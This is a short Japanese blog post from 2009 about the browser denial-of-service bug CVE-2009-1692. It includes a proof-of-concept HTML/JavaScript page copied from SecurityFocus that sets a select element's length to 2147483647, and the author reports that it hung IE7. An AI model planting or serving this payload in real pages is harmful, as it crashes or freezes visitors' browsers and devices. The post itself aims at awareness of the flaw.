ネットワークとプログラム

ネットワークとプログラムで困ったこと、勉強したこと、その他をつづっていくページです。

IE、Operaなどのブラウザの脆弱性について

2009年07月19日 | プログラム
以下の記事を見つけました。場所は、マイコミジャーナルからです。

[サイトの文頭は以下になります]
SecurityFocusは15日(カナダ時間)、IE、Chrome、Safari、Opera、Thunderbird、iPhone、Wii、PS3など広範囲に渡ってブラウザ、OS、デバイスに共通の問題があり、ブラウザの終了、OSの再起動、ハードウェアのハングアップなどの不具合が発生することを発表した(CVE-2009-1692)。・・・

詳細は、上記のサイトに記述があるので、早速、SecurityFocus ここへ行き、ソースを確認し、以下の内容について、IE7で試しました。スクリプト部分は、サイトにあったものをコピー。ボタンで動作するようにする。以下は、タグを全角で表示しています。

-----------------------

<html>
<head><title>暴走</title>
<script>
function poc(o) {
 e = document.createElement("select");
 e.length=2147483647;
}
function go() {
 alert("暴走しますよ。"); ←確認のため。
 poc(0);
}
</script>
</head>
<body>
<input type=button name="test" value="テスト" onclick="go()">
</body>
</html>
------------------------------------------

実際にボタンを押すと、IE7のCPUが70%を越え、ハングアップしました。
タスクマネージャから強制終了しました。 
実行する場合は、自己責任で行いましょう。タグで開かず、新しいブラウザを開いて実行しましょう。

アプリケーションには、このような脆弱性があることを、ぜひ知ってもらいたいですね。

メモメモ 


最新の画像もっと見る